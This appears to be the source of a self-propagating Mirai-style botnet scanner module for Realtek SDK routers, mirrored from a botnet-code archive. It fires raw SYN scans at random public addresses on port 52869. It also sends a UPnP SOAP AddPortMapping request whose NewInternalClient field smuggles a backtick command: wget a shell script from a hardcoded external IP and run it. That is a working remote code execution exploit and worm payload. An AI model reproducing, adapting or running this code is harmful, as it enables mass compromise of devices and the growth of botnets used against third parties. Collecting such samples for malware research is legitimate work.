mirror of https://github.com/threatland/TL-BOTS
525 lines
18 KiB
C
525 lines
18 KiB
C
#ifdef SELFREP
|
|
|
|
#define _GNU_SOURCE
|
|
|
|
#ifdef DEBUG
|
|
#include <stdio.h>
|
|
#endif
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <sys/socket.h>
|
|
#include <arpa/inet.h>
|
|
#include <sys/select.h>
|
|
#include <sys/types.h>
|
|
#include <time.h>
|
|
#include <fcntl.h>
|
|
#include <signal.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <linux/ip.h>
|
|
#include <linux/tcp.h>
|
|
|
|
#include "includes.h"
|
|
#include "realtek_scanner.h"
|
|
#include "table.h"
|
|
#include "rand.h"
|
|
#include "util.h"
|
|
#include "checksum.h"
|
|
|
|
int realtek_scanner_pid = 0, realtek_rsck = 0, realtek_rsck_out = 0, realtek_auth_table_len = 0;
|
|
char realtek_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
|
|
struct realtek_scanner_auth *realtek_auth_table = NULL;
|
|
struct realtek_scanner_connection *conn_table;
|
|
uint16_t realtek_realtek_auth_table_max_weight = 0;
|
|
uint32_t realtek_fake_time = 0;
|
|
|
|
int realtek_recv_strip_null(int sock, void *buf, int len, int flags)
|
|
{
|
|
int ret = recv(sock, buf, len, flags);
|
|
|
|
if(ret > 0)
|
|
{
|
|
int i = 0;
|
|
|
|
for(i = 0; i < ret; i++)
|
|
{
|
|
if(((char *)buf)[i] == 0x00)
|
|
{
|
|
((char *)buf)[i] = 'A';
|
|
}
|
|
}
|
|
}
|
|
|
|
return ret;
|
|
}
|
|
|
|
void realtek_scanner(void)
|
|
{
|
|
int i = 0;
|
|
uint16_t source_port;
|
|
struct iphdr *iph;
|
|
struct tcphdr *tcph;
|
|
|
|
// Let parent continue on main thread
|
|
realtek_scanner_pid = fork();
|
|
if(realtek_scanner_pid > 0 || realtek_scanner_pid == -1)
|
|
return;
|
|
|
|
LOCAL_ADDR = util_local_addr();
|
|
|
|
rand_init();
|
|
realtek_fake_time = time(NULL);
|
|
conn_table = calloc(REALTEK_SCANNER_MAX_CONNS, sizeof(struct realtek_scanner_connection));
|
|
for(i = 0; i < REALTEK_SCANNER_MAX_CONNS; i++)
|
|
{
|
|
conn_table[i].state = REALTEK_SC_CLOSED;
|
|
conn_table[i].fd = -1;
|
|
conn_table[i].credential_index = 0;
|
|
}
|
|
|
|
// Set up raw socket scanning and payload
|
|
if((realtek_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] failed to initialize raw socket, cannot scan\n");
|
|
#endif
|
|
exit(0);
|
|
}
|
|
fcntl(realtek_rsck, F_SETFL, O_NONBLOCK | fcntl(realtek_rsck, F_GETFL, 0));
|
|
i = 1;
|
|
if(setsockopt(realtek_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");
|
|
#endif
|
|
close(realtek_rsck);
|
|
exit(0);
|
|
}
|
|
|
|
do
|
|
{
|
|
source_port = rand_next() & 0xffff;
|
|
}
|
|
while(ntohs(source_port) < 1024);
|
|
|
|
iph = (struct iphdr *)realtek_scanner_rawpkt;
|
|
tcph = (struct tcphdr *)(iph + 1);
|
|
|
|
// Set up IPv4 header
|
|
iph->ihl = 5;
|
|
iph->version = 4;
|
|
iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
|
|
iph->id = rand_next();
|
|
iph->ttl = 64;
|
|
iph->protocol = IPPROTO_TCP;
|
|
|
|
// Set up TCP header
|
|
tcph->dest = htons(52869);
|
|
tcph->source = source_port;
|
|
tcph->doff = 5;
|
|
tcph->window = rand_next() & 0xffff;
|
|
tcph->syn = TRUE;
|
|
|
|
#ifdef DEBUG
|
|
printf("[scanner] scanner process initialized. scanning started.\n");
|
|
#endif
|
|
|
|
// Main logic loop
|
|
while(TRUE)
|
|
{
|
|
fd_set fdset_rd, fdset_wr;
|
|
struct realtek_scanner_connection *conn;
|
|
struct timeval tim;
|
|
int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
|
|
|
|
// Spew out SYN to try and get a response
|
|
if(realtek_fake_time != last_spew)
|
|
{
|
|
last_spew = realtek_fake_time;
|
|
|
|
for(i = 0; i < REALTEK_SCANNER_RAW_PPS; i++)
|
|
{
|
|
struct sockaddr_in paddr = {0};
|
|
struct iphdr *iph = (struct iphdr *)realtek_scanner_rawpkt;
|
|
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
|
|
|
|
iph->id = rand_next();
|
|
iph->saddr = LOCAL_ADDR;
|
|
iph->daddr = get_random_realtek_ip();
|
|
iph->check = 0;
|
|
iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));
|
|
|
|
tcph->dest = htons(52869);
|
|
tcph->seq = iph->daddr;
|
|
tcph->check = 0;
|
|
tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));
|
|
|
|
paddr.sin_family = AF_INET;
|
|
paddr.sin_addr.s_addr = iph->daddr;
|
|
paddr.sin_port = tcph->dest;
|
|
|
|
sendto(realtek_rsck, realtek_scanner_rawpkt, sizeof(realtek_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
|
|
}
|
|
}
|
|
|
|
// Read packets from raw socket to get SYN+ACKs
|
|
last_avail_conn = 0;
|
|
while(TRUE)
|
|
{
|
|
int n = 0;
|
|
char dgram[1514];
|
|
struct iphdr *iph = (struct iphdr *)dgram;
|
|
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
|
|
struct realtek_scanner_connection *conn;
|
|
|
|
errno = 0;
|
|
n = recvfrom(realtek_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
|
|
if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
|
|
break;
|
|
|
|
if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))
|
|
continue;
|
|
if(iph->daddr != LOCAL_ADDR)
|
|
continue;
|
|
if(iph->protocol != IPPROTO_TCP)
|
|
continue;
|
|
if(tcph->source != htons(52869))
|
|
continue;
|
|
if(tcph->dest != source_port)
|
|
continue;
|
|
if(!tcph->syn)
|
|
continue;
|
|
if(!tcph->ack)
|
|
continue;
|
|
if(tcph->rst)
|
|
continue;
|
|
if(tcph->fin)
|
|
continue;
|
|
if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
|
|
continue;
|
|
|
|
conn = NULL;
|
|
for(n = last_avail_conn; n < REALTEK_SCANNER_MAX_CONNS; n++)
|
|
{
|
|
if(conn_table[n].state == REALTEK_SC_CLOSED)
|
|
{
|
|
conn = &conn_table[n];
|
|
last_avail_conn = n;
|
|
break;
|
|
}
|
|
}
|
|
|
|
// If there were no slots, then no point reading any more
|
|
if(conn == NULL)
|
|
break;
|
|
|
|
conn->dst_addr = iph->saddr;
|
|
conn->dst_port = tcph->source;
|
|
realtek_setup_connection(conn);
|
|
}
|
|
|
|
FD_ZERO(&fdset_rd);
|
|
FD_ZERO(&fdset_wr);
|
|
|
|
for(i = 0; i < REALTEK_SCANNER_MAX_CONNS; i++)
|
|
{
|
|
int timeout = 5;
|
|
|
|
conn = &conn_table[i];
|
|
//timeout = (conn->state > REALTEK_SC_CONNECTING ? 30 : 5);
|
|
|
|
if(conn->state != REALTEK_SC_CLOSED && (realtek_fake_time - conn->last_recv) > timeout)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
|
|
#endif
|
|
|
|
close(conn->fd);
|
|
conn->fd = -1;
|
|
conn->state = REALTEK_SC_CLOSED;
|
|
free(conn->credentials);
|
|
conn->credential_index = 0;
|
|
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
|
|
|
|
continue;
|
|
}
|
|
|
|
if(conn->state == REALTEK_SC_CONNECTING || conn->state == REALTEK_SC_EXPLOIT_STAGE2 || conn->state == REALTEK_SC_EXPLOIT_STAGE3)
|
|
{
|
|
FD_SET(conn->fd, &fdset_wr);
|
|
if(conn->fd > mfd_wr)
|
|
mfd_wr = conn->fd;
|
|
}
|
|
else if(conn->state != REALTEK_SC_CLOSED)
|
|
{
|
|
FD_SET(conn->fd, &fdset_rd);
|
|
if(conn->fd > mfd_rd)
|
|
mfd_rd = conn->fd;
|
|
}
|
|
}
|
|
|
|
tim.tv_usec = 0;
|
|
tim.tv_sec = 3;
|
|
nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
|
|
realtek_fake_time = time(NULL);
|
|
|
|
for(i = 0; i < REALTEK_SCANNER_MAX_CONNS; i++)
|
|
{
|
|
conn = &conn_table[i];
|
|
|
|
if(conn->fd == -1)
|
|
continue;
|
|
|
|
if(FD_ISSET(conn->fd, &fdset_wr))
|
|
{
|
|
int err = 0, ret = 0;
|
|
socklen_t err_len = sizeof(err);
|
|
|
|
ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
|
|
if(err == 0 && ret == 0)
|
|
{
|
|
|
|
if(conn->state == REALTEK_SC_EXPLOIT_STAGE2)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d request sent to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
|
|
#endif
|
|
|
|
// build stage 2 payload
|
|
util_strcpy(conn->payload_buf, "POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://185.244.25.176/bins/wget.sh -O - > /var/Nikki;sh/var/Nikki`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
|
|
|
|
// actually send the payload
|
|
send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
|
|
|
|
// clear the payload buffer
|
|
util_zero(conn->payload_buf, sizeof(conn->payload_buf));
|
|
|
|
// clear the socket buffer
|
|
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
|
|
|
|
conn->state = REALTEK_SC_CLOSED;
|
|
close(conn->fd);
|
|
conn->fd = -1;
|
|
|
|
continue;
|
|
}
|
|
else if(conn->state == REALTEK_SC_EXPLOIT_STAGE3)
|
|
{
|
|
conn->state = REALTEK_SC_CLOSED;
|
|
|
|
continue;
|
|
}
|
|
else
|
|
{
|
|
conn->credentials = malloc(256);
|
|
conn->state = REALTEK_SC_EXPLOIT_STAGE2;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
|
|
#endif
|
|
|
|
close(conn->fd);
|
|
conn->fd = -1;
|
|
conn->state = REALTEK_SC_CLOSED;
|
|
|
|
continue;
|
|
}
|
|
}
|
|
|
|
if(FD_ISSET(conn->fd, &fdset_rd))
|
|
{
|
|
while(TRUE)
|
|
{
|
|
int ret = 0;
|
|
|
|
if(conn->state == REALTEK_SC_CLOSED)
|
|
break;
|
|
close(conn->fd);
|
|
|
|
if(conn->rdbuf_pos == REALTEK_SCANNER_RDBUF_SIZE)
|
|
{
|
|
memmove(conn->rdbuf, conn->rdbuf + REALTEK_SCANNER_HACK_DRAIN, REALTEK_SCANNER_RDBUF_SIZE - REALTEK_SCANNER_HACK_DRAIN);
|
|
conn->rdbuf_pos -= REALTEK_SCANNER_HACK_DRAIN;
|
|
}
|
|
|
|
errno = 0;
|
|
ret = realtek_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, REALTEK_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
|
|
if(ret == 0)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);
|
|
#endif
|
|
errno = ECONNRESET;
|
|
ret = -1;
|
|
}
|
|
if(ret == -1)
|
|
{
|
|
if(errno != EAGAIN && errno != EWOULDBLOCK)
|
|
{
|
|
if(conn->state == REALTEK_SC_EXPLOIT_STAGE2)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);
|
|
#endif
|
|
close(conn->fd);
|
|
realtek_setup_connection(conn);
|
|
continue;
|
|
}
|
|
|
|
close(conn->fd);
|
|
conn->fd = -1;
|
|
conn->state = REALTEK_SC_CLOSED;
|
|
free(conn->credentials);
|
|
conn->credential_index = 0;
|
|
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
|
|
}
|
|
break;
|
|
}
|
|
|
|
conn->rdbuf_pos += ret;
|
|
conn->last_recv = realtek_fake_time;
|
|
|
|
int len = util_strlen(conn->rdbuf);
|
|
conn->rdbuf[len] = 0;
|
|
|
|
if(conn->state == REALTEK_SC_GET_CREDENTIALS)
|
|
{
|
|
char *out = strtok(conn->rdbuf, " ");
|
|
|
|
while(out != NULL)
|
|
{
|
|
if(strstr(out, ""))
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d parsing credentials...\n", conn->fd);
|
|
#endif
|
|
|
|
memmove(out, out + 11, strlen(out));
|
|
|
|
int i = 0;
|
|
|
|
for(i = 0; i < strlen(out); i++)
|
|
{
|
|
if(out[i] == ';' || out[i] == '"' || out[i] == ' ')
|
|
out[i] = 0;
|
|
}
|
|
|
|
conn->credentials[conn->credential_index] = strdup(out);
|
|
conn->credential_index++;
|
|
|
|
}
|
|
|
|
out = strtok(NULL, " ");
|
|
}
|
|
}
|
|
|
|
if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d failed to retrieve credentials\n", conn->fd);
|
|
#endif
|
|
close(conn->fd);
|
|
conn->fd = -1;
|
|
conn->state = REALTEK_SC_CLOSED;
|
|
free(conn->credentials);
|
|
conn->credential_index = 0;
|
|
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
|
|
}
|
|
else
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);
|
|
#endif
|
|
|
|
close(conn->fd);
|
|
conn->fd = -1;
|
|
conn->state = REALTEK_SC_EXPLOIT_STAGE2;
|
|
conn->credential_index = 0;
|
|
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
void realtek_kill(void)
|
|
{
|
|
kill(realtek_scanner_pid, 9);
|
|
}
|
|
|
|
static void realtek_setup_connection(struct realtek_scanner_connection *conn)
|
|
{
|
|
struct sockaddr_in addr = {0};
|
|
|
|
if(conn->fd != -1)
|
|
close(conn->fd);
|
|
|
|
if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
|
|
{
|
|
#ifdef DEBUG
|
|
printf("[scanner] failed to call socket()\n");
|
|
#endif
|
|
return;
|
|
}
|
|
|
|
conn->rdbuf_pos = 0;
|
|
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
|
|
|
|
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
|
|
|
|
addr.sin_family = AF_INET;
|
|
addr.sin_addr.s_addr = conn->dst_addr;
|
|
addr.sin_port = conn->dst_port;
|
|
|
|
conn->last_recv = realtek_fake_time;
|
|
|
|
if(conn->state == REALTEK_SC_EXPLOIT_STAGE2 || conn->state == REALTEK_SC_EXPLOIT_STAGE3)
|
|
{
|
|
}
|
|
else
|
|
{
|
|
conn->state = REALTEK_SC_CONNECTING;
|
|
}
|
|
|
|
connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
|
|
}
|
|
|
|
static ipv4_t get_random_realtek_ip(void)
|
|
{
|
|
uint32_t tmp;
|
|
uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;
|
|
|
|
do
|
|
{
|
|
tmp = rand_next();
|
|
|
|
o1 = tmp & 0xff;
|
|
o2 = (tmp >> 8) & 0xff;
|
|
o3 = (tmp >> 16) & 0xff;
|
|
o4 = (tmp >> 24) & 0xff;
|
|
}
|
|
while(o1 == 127 || // 127.0.0.0/8 - Loopback
|
|
(o1 == 0) || // 0.0.0.0/8 - Invalid address space
|
|
(o1 == 3) || // 3.0.0.0/8 - General Electric Company
|
|
(o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
|
|
(o1 == 56) || // 56.0.0.0/8 - US Postal Service
|
|
(o1 == 10) || // 10.0.0.0/8 - Internal network
|
|
(o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
|
|
(o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
|
|
(o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
|
|
(o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
|
|
(o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
|
|
(o1 >= 224) || // 224.*.*.*+ - Multicast
|
|
(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
|
|
);
|
|
|
|
return INET_ADDR(o1,o2,o3,o4);
|
|
}
|
|
|
|
#endif
|
|
|